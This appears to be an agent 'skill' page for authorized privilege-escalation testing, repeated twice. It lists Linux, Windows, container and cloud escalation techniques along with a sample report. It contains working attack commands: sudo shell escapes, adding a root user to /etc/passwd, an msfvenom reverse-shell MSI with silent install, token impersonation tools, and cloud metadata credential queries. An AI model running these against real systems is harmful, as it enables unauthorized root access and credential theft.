Performing Privilege Escalation Assessment

When to Use

After gaining initial low-privilege access during a penetration test to demonstrate full system compromise
Assessing the security hardening of Linux and Windows servers against local privilege escalation attacks
Evaluating whether endpoint detection and response (EDR) tools detect common privilege escalation techniques
Testing the effectiveness of least-privilege policies and application whitelisting on endpoints
Validating that container breakout and VM escape controls are properly configured

Do not use without written authorization, against production systems where exploitation could cause downtime, or for deploying kernel exploits on systems without prior approval and rollback capability.

Prerequisites

Low-privilege shell access (reverse shell, SSH, RDP) to the target system obtained through authorized means
Privilege escalation enumeration scripts: linPEAS (Linux), winPEAS (Windows), Linux Smart Enumeration (LSE)
Compiled kernel exploits for common CVEs or access to compilation tools on the target
GTFOBins reference for Linux SUID/sudo binary abuse and LOLBAS reference for Windows living-off-the-land binaries
Precompiled post-exploitation binaries for the target architecture if compilation is not available on the target

Workflow

Step 1: System Enumeration

Gather comprehensive information about the target system:

Linux Enumeration:

id && whoami - Current user and group memberships
uname -a - Kernel version for kernel exploit identification
cat /etc/os-release - Distribution and version
sudo -l - Commands the current user can run as root via sudo
find / -perm -4000 -type f 2>/dev/null - SUID binaries
find / -perm -2000 -type f 2>/dev/null - SGID binaries
crontab -l && ls -la /etc/cron* - Scheduled tasks running as root
ps aux | grep root - Processes running as root
cat /etc/passwd - User accounts (look for additional users with UID 0)
find / -writable -type d 2>/dev/null - World-writable directories
Run linpeas.sh for automated comprehensive enumeration

Windows Enumeration:

whoami /priv - Current user privileges (look for SeImpersonatePrivilege, SeDebugPrivilege)
systeminfo - OS version, hotfix level, architecture
wmic service get name,pathname,startmode - Unquoted service paths
icacls "C:\Program Files" /T - Writable directories in Program Files
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated - AlwaysInstallElevated check
cmdkey /list - Stored Windows credentials
schtasks /query /fo LIST /v - Scheduled tasks with their run-as accounts
Run winPEAS.exe for automated comprehensive enumeration

Step 2: Linux Privilege Escalation Vectors

Test identified escalation vectors systematically:

Sudo misconfigurations: If sudo -l shows entries like (ALL) NOPASSWD: /usr/bin/vim, use GTFOBins to escalate:
sudo vim -c ':!/bin/bash' to spawn a root shell
Common dangerous sudo entries: vim, less, find, nmap, python, perl, ruby, awk, env
SUID binary abuse: If a SUID binary is identified that allows arbitrary command execution, shell escape, or file read:
Custom SUID: Check if a custom SUID binary calls other programs without absolute paths (PATH injection)
Known SUID: Check GTFOBins for exploitation of standard SUID binaries
Cron job exploitation: If a cron job runs a script writable by the current user, or runs a script from a writable directory:
Modify the script to add a reverse shell or SUID copy of bash
PATH-based cron exploitation: if the cron job calls a command without absolute path and PATH is writable
Kernel exploits: Match the kernel version to known exploits:
DirtyPipe (CVE-2022-0847): Linux kernel 5.8-5.16.11
DirtyCow (CVE-2016-5195): Linux kernel 2.6.22-4.8.3
PwnKit (CVE-2021-4034): Polkit pkexec vulnerability affecting most Linux distributions
Capabilities abuse: getcap -r / 2>/dev/null to find binaries with elevated capabilities (cap_setuid, cap_dac_override)
Writable /etc/passwd: If /etc/passwd is writable, add a new root user: echo 'newroot:$1$hash:0:0::/root:/bin/bash' >> /etc/passwd

Step 3: Windows Privilege Escalation Vectors

Test Windows-specific escalation paths:

Token impersonation: If the user has SeImpersonatePrivilege (common for service accounts and IIS):
Use JuicyPotato.exe, PrintSpoofer.exe, or GodPotato.exe to impersonate SYSTEM
PrintSpoofer.exe -i -c "cmd /c whoami" -> NT AUTHORITY\SYSTEM
Unquoted service paths: If a service has an unquoted path with spaces (e.g., C:\Program Files\My App\service.exe) and you can write to an intermediate directory:
Place a malicious executable at C:\Program Files\My.exe which will execute when the service restarts
Writable service binaries: If you can modify the executable of a service running as SYSTEM:
Replace the binary with a reverse shell and restart the service
AlwaysInstallElevated: If both HKLM and HKCU AlwaysInstallElevated registry keys are set to 1:
Generate a malicious MSI: msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f msi -o shell.msi
Install with elevated privileges: msiexec /quiet /qn /i shell.msi
Stored credentials: Check for credentials in cmdkey /list, AutoLogon registry keys, unattend.xml, web.config files, and PowerShell history
DLL hijacking: Identify services that load DLLs from writable directories. Use Process Monitor to find missing DLL loads, then place a malicious DLL.
Scheduled tasks: Find tasks running as SYSTEM with writable scripts or binaries

Step 4: Container and Cloud Escalation

Test for escalation paths in containerized and cloud environments:

Docker breakout: Check if the container runs in privileged mode (--privileged), has the Docker socket mounted (/var/run/docker.sock), or has SYS_ADMIN capability
Kubernetes pod escalation: Check for service account tokens with cluster-admin rights, hostPID/hostNetwork namespaces, or hostPath volume mounts
Cloud metadata: Access cloud instance metadata from compromised hosts (http://169.254.169.254/latest/meta-data/) to discover IAM roles, credentials, and instance information
IAM role abuse: If cloud credentials are discovered, enumerate IAM permissions and test for privilege escalation through IAM policy manipulation

Step 5: Documentation and Impact Assessment

Document the complete escalation path and business impact:

Record every command executed during escalation with timestamps
Capture proof of elevated access (whoami showing root/SYSTEM, accessing restricted files)
Document what data or systems become accessible at the elevated privilege level
Map the escalation technique to MITRE ATT&CK (T1548 - Abuse Elevation Control Mechanism, T1068 - Exploitation for Privilege Escalation)
Provide specific remediation for each identified escalation vector

Key Concepts

Term	Definition
SUID Binary	A Linux binary with the Set User ID bit enabled, which executes with the file owner's privileges (typically root) regardless of who runs it
SeImpersonatePrivilege	A Windows privilege that allows a process to impersonate another user's security token, commonly abused by service accounts to escalate to SYSTEM
Kernel Exploit	An exploit targeting a vulnerability in the operating system kernel to gain ring-0 or root/SYSTEM-level access
GTFOBins	A curated list of Unix binaries that can be exploited for privilege escalation, file read/write, or shell escape when misconfigured
LOLBAS	Living Off The Land Binaries and Scripts; legitimate Windows binaries that can be abused for code execution, file operations, or persistence
DLL Hijacking	Exploiting the DLL search order on Windows to load a malicious DLL by placing it in a directory searched before the legitimate DLL location
Token Impersonation	A Windows technique where a compromised process with appropriate privileges captures and uses another user's access token to execute commands as that user

Tools & Systems

linPEAS / winPEAS: Automated privilege escalation enumeration scripts that check hundreds of potential escalation vectors on Linux and Windows
GTFOBins / LOLBAS: Reference databases of Unix binaries and Windows binaries that can be exploited for privilege escalation when misconfigured
PrintSpoofer / GodPotato: Windows privilege escalation tools that exploit SeImpersonatePrivilege to achieve SYSTEM-level access from service accounts
Linux Exploit Suggester: Script that compares the target kernel version against a database of known kernel exploits to identify applicable exploits

Common Scenarios

Scenario: Privilege Escalation on a Linux Web Server

Context: During a penetration test, the security assessor gained a low-privilege shell as www-data on an Ubuntu 22.04 web server through a PHP file upload vulnerability. The goal is to escalate to root to demonstrate full server compromise.

Approach:

Run linpeas.sh which identifies that www-data can run /usr/bin/find as root via sudo without a password
Verify with sudo -l: (root) NOPASSWD: /usr/bin/find
Consult GTFOBins for the find sudo entry: sudo find . -exec /bin/bash -p \; -quit
Execute the command and obtain a root shell
As root, access /etc/shadow to extract password hashes, read database credentials from the application configuration, and access the MySQL database containing customer PII
Document: initial access as www-data -> sudo misconfiguration -> root shell -> database access -> 75,000 customer records accessible

Pitfalls:

Running kernel exploits without testing on a similar system first, risking a kernel panic and system crash
Not checking for container environments where apparent root access may be limited to the container namespace
Ignoring cloud metadata endpoints accessible from the compromised host that may yield IAM credentials
Failing to enumerate capabilities and SUID binaries after checking sudo, missing alternative escalation paths

Output Format

## Finding: Sudo Misconfiguration Allowing Root Escalation via find

**ID**: PRIV-001
**Severity**: Critical (CVSS 8.8)
**Affected Host**: web-prod-01 (10.10.5.15)
**OS**: Ubuntu 22.04 LTS
**Initial Access**: www-data (via PHP file upload - WEB-004)
**Escalation Technique**: MITRE ATT&CK T1548.003 - Sudo and Sudo Caching

**Description**:
The www-data user is configured in /etc/sudoers to execute /usr/bin/find as root
without a password. The find command supports the -exec flag which can spawn a
root shell, effectively granting www-data unrestricted root access.

**Proof of Concept**:
www-data@web-prod-01:~$ sudo -l
(root) NOPASSWD: /usr/bin/find
www-data@web-prod-01:~$ sudo find . -exec /bin/bash -p \; -quit
root@web-prod-01:~# id
uid=0(root) gid=0(root) groups=0(root)

**Impact**:
Full root access on the production web server. From root, the security assessor accessed
database credentials in /var/www/app/.env, connected to MySQL, and confirmed
read access to 75,000 customer records including names, emails, and addresses.

**Remediation**:
1. Remove the /usr/bin/find sudo entry for www-data
2. If find access is required, restrict it to specific directories with --no-exec
3. Audit all sudo entries for binaries listed in GTFOBins
4. Implement sudo logging with auditd for all privileged command execution

Verification Criteria

Confirm successful execution by validating:

[ ] All prerequisite tools and access requirements are satisfied
[ ] Each workflow step completed without errors
[ ] Output matches expected format and contains expected data
[ ] No security warnings or misconfigurations detected
[ ] Results are documented and evidence is preserved for audit

Compliance Framework Mapping

This skill supports compliance evidence collection across multiple frameworks:

SOC 2: CC4.1 (Monitoring & Evaluation), CC7.1 (Monitoring)
ISO 27001: A.14.2 (Secure Development), A.18.2 (Information Security Reviews)
NIST 800-53: CA-8 (Penetration Testing), RA-5 (Vulnerability Scanning)
NIST CSF: ID.RA (Risk Assessment)

Claw GRC Tip: When this skill is executed by a registered agent, compliance evidence is automatically captured and mapped to the relevant controls in your active frameworks.

Deploying This Skill with Claw GRC

Agent Execution

# Install via CLI
npx claw-grc skills add performing-privilege-escalation-assessment

# Or load dynamically via MCP
grc.load_skill("performing-privilege-escalation-assessment")

Audit Trail Integration

When executed through Claw GRC, every step of this skill generates tamper-evident audit records:

SHA-256 chain hashing ensures no step can be modified after execution
Evidence artifacts (configs, scan results, logs) are automatically attached to relevant controls
Trust score impact — successful execution increases your agent's trust score

Continuous Compliance

Schedule this skill for recurring execution to maintain continuous compliance posture. Claw GRC monitors for drift and alerts when re-execution is needed.

Performing Privilege Escalation Assessment

When to Use

After gaining initial low-privilege access during a penetration test to demonstrate full system compromise
Assessing the security hardening of Linux and Windows servers against local privilege escalation attacks
Evaluating whether endpoint detection and response (EDR) tools detect common privilege escalation techniques
Testing the effectiveness of least-privilege policies and application whitelisting on endpoints
Validating that container breakout and VM escape controls are properly configured

Prerequisites

Low-privilege shell access (reverse shell, SSH, RDP) to the target system obtained through authorized means
Privilege escalation enumeration scripts: linPEAS (Linux), winPEAS (Windows), Linux Smart Enumeration (LSE)
Compiled kernel exploits for common CVEs or access to compilation tools on the target
GTFOBins reference for Linux SUID/sudo binary abuse and LOLBAS reference for Windows living-off-the-land binaries
Precompiled post-exploitation binaries for the target architecture if compilation is not available on the target

Workflow

Step 1: System Enumeration

Gather comprehensive information about the target system:

Linux Enumeration:

id && whoami - Current user and group memberships
uname -a - Kernel version for kernel exploit identification
cat /etc/os-release - Distribution and version
sudo -l - Commands the current user can run as root via sudo
find / -perm -4000 -type f 2>/dev/null - SUID binaries
find / -perm -2000 -type f 2>/dev/null - SGID binaries
crontab -l && ls -la /etc/cron* - Scheduled tasks running as root
ps aux | grep root - Processes running as root
cat /etc/passwd - User accounts (look for additional users with UID 0)
find / -writable -type d 2>/dev/null - World-writable directories
Run linpeas.sh for automated comprehensive enumeration

Windows Enumeration:

whoami /priv - Current user privileges (look for SeImpersonatePrivilege, SeDebugPrivilege)
systeminfo - OS version, hotfix level, architecture
wmic service get name,pathname,startmode - Unquoted service paths
icacls "C:\Program Files" /T - Writable directories in Program Files
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated - AlwaysInstallElevated check
cmdkey /list - Stored Windows credentials
schtasks /query /fo LIST /v - Scheduled tasks with their run-as accounts
Run winPEAS.exe for automated comprehensive enumeration

Step 2: Linux Privilege Escalation Vectors

Test identified escalation vectors systematically:

Sudo misconfigurations: If sudo -l shows entries like (ALL) NOPASSWD: /usr/bin/vim, use GTFOBins to escalate:
sudo vim -c ':!/bin/bash' to spawn a root shell
Common dangerous sudo entries: vim, less, find, nmap, python, perl, ruby, awk, env
SUID binary abuse: If a SUID binary is identified that allows arbitrary command execution, shell escape, or file read:
Custom SUID: Check if a custom SUID binary calls other programs without absolute paths (PATH injection)
Known SUID: Check GTFOBins for exploitation of standard SUID binaries
Cron job exploitation: If a cron job runs a script writable by the current user, or runs a script from a writable directory:
Modify the script to add a reverse shell or SUID copy of bash
PATH-based cron exploitation: if the cron job calls a command without absolute path and PATH is writable
Kernel exploits: Match the kernel version to known exploits:
DirtyPipe (CVE-2022-0847): Linux kernel 5.8-5.16.11
DirtyCow (CVE-2016-5195): Linux kernel 2.6.22-4.8.3
PwnKit (CVE-2021-4034): Polkit pkexec vulnerability affecting most Linux distributions
Capabilities abuse: getcap -r / 2>/dev/null to find binaries with elevated capabilities (cap_setuid, cap_dac_override)
Writable /etc/passwd: If /etc/passwd is writable, add a new root user: echo 'newroot:$1$hash:0:0::/root:/bin/bash' >> /etc/passwd

Step 3: Windows Privilege Escalation Vectors

Test Windows-specific escalation paths:

Token impersonation: If the user has SeImpersonatePrivilege (common for service accounts and IIS):
Use JuicyPotato.exe, PrintSpoofer.exe, or GodPotato.exe to impersonate SYSTEM
PrintSpoofer.exe -i -c "cmd /c whoami" -> NT AUTHORITY\SYSTEM
Unquoted service paths: If a service has an unquoted path with spaces (e.g., C:\Program Files\My App\service.exe) and you can write to an intermediate directory:
Place a malicious executable at C:\Program Files\My.exe which will execute when the service restarts
Writable service binaries: If you can modify the executable of a service running as SYSTEM:
Replace the binary with a reverse shell and restart the service
AlwaysInstallElevated: If both HKLM and HKCU AlwaysInstallElevated registry keys are set to 1:
Generate a malicious MSI: msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f msi -o shell.msi
Install with elevated privileges: msiexec /quiet /qn /i shell.msi
Stored credentials: Check for credentials in cmdkey /list, AutoLogon registry keys, unattend.xml, web.config files, and PowerShell history
DLL hijacking: Identify services that load DLLs from writable directories. Use Process Monitor to find missing DLL loads, then place a malicious DLL.
Scheduled tasks: Find tasks running as SYSTEM with writable scripts or binaries

Step 4: Container and Cloud Escalation

Test for escalation paths in containerized and cloud environments:

Docker breakout: Check if the container runs in privileged mode (--privileged), has the Docker socket mounted (/var/run/docker.sock), or has SYS_ADMIN capability
Kubernetes pod escalation: Check for service account tokens with cluster-admin rights, hostPID/hostNetwork namespaces, or hostPath volume mounts
Cloud metadata: Access cloud instance metadata from compromised hosts (http://169.254.169.254/latest/meta-data/) to discover IAM roles, credentials, and instance information
IAM role abuse: If cloud credentials are discovered, enumerate IAM permissions and test for privilege escalation through IAM policy manipulation

Step 5: Documentation and Impact Assessment

Document the complete escalation path and business impact:

Record every command executed during escalation with timestamps
Capture proof of elevated access (whoami showing root/SYSTEM, accessing restricted files)
Document what data or systems become accessible at the elevated privilege level
Map the escalation technique to MITRE ATT&CK (T1548 - Abuse Elevation Control Mechanism, T1068 - Exploitation for Privilege Escalation)
Provide specific remediation for each identified escalation vector

Key Concepts

Term	Definition
SUID Binary	A Linux binary with the Set User ID bit enabled, which executes with the file owner's privileges (typically root) regardless of who runs it
SeImpersonatePrivilege	A Windows privilege that allows a process to impersonate another user's security token, commonly abused by service accounts to escalate to SYSTEM
Kernel Exploit	An exploit targeting a vulnerability in the operating system kernel to gain ring-0 or root/SYSTEM-level access
GTFOBins	A curated list of Unix binaries that can be exploited for privilege escalation, file read/write, or shell escape when misconfigured
LOLBAS	Living Off The Land Binaries and Scripts; legitimate Windows binaries that can be abused for code execution, file operations, or persistence
DLL Hijacking	Exploiting the DLL search order on Windows to load a malicious DLL by placing it in a directory searched before the legitimate DLL location
Token Impersonation	A Windows technique where a compromised process with appropriate privileges captures and uses another user's access token to execute commands as that user

Tools & Systems

linPEAS / winPEAS: Automated privilege escalation enumeration scripts that check hundreds of potential escalation vectors on Linux and Windows
GTFOBins / LOLBAS: Reference databases of Unix binaries and Windows binaries that can be exploited for privilege escalation when misconfigured
PrintSpoofer / GodPotato: Windows privilege escalation tools that exploit SeImpersonatePrivilege to achieve SYSTEM-level access from service accounts
Linux Exploit Suggester: Script that compares the target kernel version against a database of known kernel exploits to identify applicable exploits

Common Scenarios

Scenario: Privilege Escalation on a Linux Web Server

Approach:

Run linpeas.sh which identifies that www-data can run /usr/bin/find as root via sudo without a password
Verify with sudo -l: (root) NOPASSWD: /usr/bin/find
Consult GTFOBins for the find sudo entry: sudo find . -exec /bin/bash -p \; -quit
Execute the command and obtain a root shell
As root, access /etc/shadow to extract password hashes, read database credentials from the application configuration, and access the MySQL database containing customer PII
Document: initial access as www-data -> sudo misconfiguration -> root shell -> database access -> 75,000 customer records accessible

Pitfalls:

Running kernel exploits without testing on a similar system first, risking a kernel panic and system crash
Not checking for container environments where apparent root access may be limited to the container namespace
Ignoring cloud metadata endpoints accessible from the compromised host that may yield IAM credentials
Failing to enumerate capabilities and SUID binaries after checking sudo, missing alternative escalation paths

Output Format

## Finding: Sudo Misconfiguration Allowing Root Escalation via find

**ID**: PRIV-001
**Severity**: Critical (CVSS 8.8)
**Affected Host**: web-prod-01 (10.10.5.15)
**OS**: Ubuntu 22.04 LTS
**Initial Access**: www-data (via PHP file upload - WEB-004)
**Escalation Technique**: MITRE ATT&CK T1548.003 - Sudo and Sudo Caching

**Description**:
The www-data user is configured in /etc/sudoers to execute /usr/bin/find as root
without a password. The find command supports the -exec flag which can spawn a
root shell, effectively granting www-data unrestricted root access.

**Proof of Concept**:
www-data@web-prod-01:~$ sudo -l
(root) NOPASSWD: /usr/bin/find
www-data@web-prod-01:~$ sudo find . -exec /bin/bash -p \; -quit
root@web-prod-01:~# id
uid=0(root) gid=0(root) groups=0(root)

**Impact**:
Full root access on the production web server. From root, the security assessor accessed
database credentials in /var/www/app/.env, connected to MySQL, and confirmed
read access to 75,000 customer records including names, emails, and addresses.

**Remediation**:
1. Remove the /usr/bin/find sudo entry for www-data
2. If find access is required, restrict it to specific directories with --no-exec
3. Audit all sudo entries for binaries listed in GTFOBins
4. Implement sudo logging with auditd for all privileged command execution

Verification Criteria

Confirm successful execution by validating:

[ ] All prerequisite tools and access requirements are satisfied
[ ] Each workflow step completed without errors
[ ] Output matches expected format and contains expected data
[ ] No security warnings or misconfigurations detected
[ ] Results are documented and evidence is preserved for audit

Compliance Framework Mapping

This skill supports compliance evidence collection across multiple frameworks:

SOC 2: CC4.1 (Monitoring & Evaluation), CC7.1 (Monitoring)
ISO 27001: A.14.2 (Secure Development), A.18.2 (Information Security Reviews)
NIST 800-53: CA-8 (Penetration Testing), RA-5 (Vulnerability Scanning)
NIST CSF: ID.RA (Risk Assessment)

Claw GRC Tip: When this skill is executed by a registered agent, compliance evidence is automatically captured and mapped to the relevant controls in your active frameworks.

Deploying This Skill with Claw GRC

Agent Execution

# Install via CLI
npx claw-grc skills add performing-privilege-escalation-assessment

# Or load dynamically via MCP
grc.load_skill("performing-privilege-escalation-assessment")

Audit Trail Integration

When executed through Claw GRC, every step of this skill generates tamper-evident audit records:

SHA-256 chain hashing ensures no step can be modified after execution
Evidence artifacts (configs, scan results, logs) are automatically attached to relevant controls
Trust score impact — successful execution increases your agent's trust score

Continuous Compliance

Schedule this skill for recurring execution to maintain continuous compliance posture. Claw GRC monitors for drift and alerts when re-execution is needed.

Prerequisites

Performing Privilege Escalation Assessment

When to Use

Prerequisites

Workflow

Step 1: System Enumeration

Step 2: Linux Privilege Escalation Vectors

Step 3: Windows Privilege Escalation Vectors

Step 4: Container and Cloud Escalation

Step 5: Documentation and Impact Assessment

Key Concepts

Tools & Systems

Common Scenarios

Scenario: Privilege Escalation on a Linux Web Server

Output Format

Verification Criteria

Compliance Framework Mapping

Deploying This Skill with Claw GRC

Agent Execution

Audit Trail Integration

Continuous Compliance

Use with Claw GRC Agents

Tags

Related Skills

Conducting Internal Network Penetration Test

Performing Active Directory Penetration Test

Conducting API Security Testing

Conducting Cloud Infrastructure Penetration Test

Conducting External Reconnaissance with OSINT

Conducting Mobile App Penetration Test

Prerequisites

Performing Privilege Escalation Assessment

When to Use

Prerequisites

Workflow

Step 1: System Enumeration

Step 2: Linux Privilege Escalation Vectors

Step 3: Windows Privilege Escalation Vectors

Step 4: Container and Cloud Escalation

Step 5: Documentation and Impact Assessment

Key Concepts

Tools & Systems

Common Scenarios

Scenario: Privilege Escalation on a Linux Web Server

Output Format

Verification Criteria

Compliance Framework Mapping

Deploying This Skill with Claw GRC

Agent Execution

Audit Trail Integration

Continuous Compliance

Use with Claw GRC Agents

Tags

Related Skills

Conducting Internal Network Penetration Test

Performing Active Directory Penetration Test

Conducting API Security Testing

Conducting Cloud Infrastructure Penetration Test

Conducting External Reconnaissance with OSINT

Conducting Mobile App Penetration Test